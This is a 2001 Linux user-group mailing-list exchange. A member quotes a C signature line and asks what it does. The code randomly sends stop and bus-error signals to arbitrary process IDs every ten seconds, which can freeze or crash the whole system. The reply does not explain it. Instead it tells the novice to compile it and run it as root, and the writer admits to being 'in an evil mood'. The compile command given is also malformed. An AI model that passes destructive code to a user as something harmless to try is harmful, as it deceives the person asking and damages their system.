[plug] BIND and WU-FTPD

Bill Kenworthy billk at iinet.net.au
Fri Mar 2 06:27:36 WST 2001


Easy, try it and see what happens.  Cut and paste into a file named,
say, test.c. compile it with "gcc -o testc.c" and then run the resulting
executable as root.

I dont have time at the moment so would be interested in what result you
get.

BillK (in an evil mood!)


Michael Hunt wrote:
> 
> > #include <signal.h>
> > #include <time.h>
> > main(){srandom(time(0));for(;;){int pid=random()%30000;if(pid>1
> > &&pid!=getpid())kill(pid,random()&1?SIGSTOP:SIGBUS);sleep(10);}}
> 
> Anyone with a bit more c than me like to put some comments in and explain
> Leons sig line.
> 
> Either I need new glasses or the heat out here is getting to me as all I see
> are lots of squiggly lines !!!
> 
> (Heat shimmering of my monitor)
> 
> Michael Hunt
> Sahara Desert
> West Africa



More information about the plug mailing list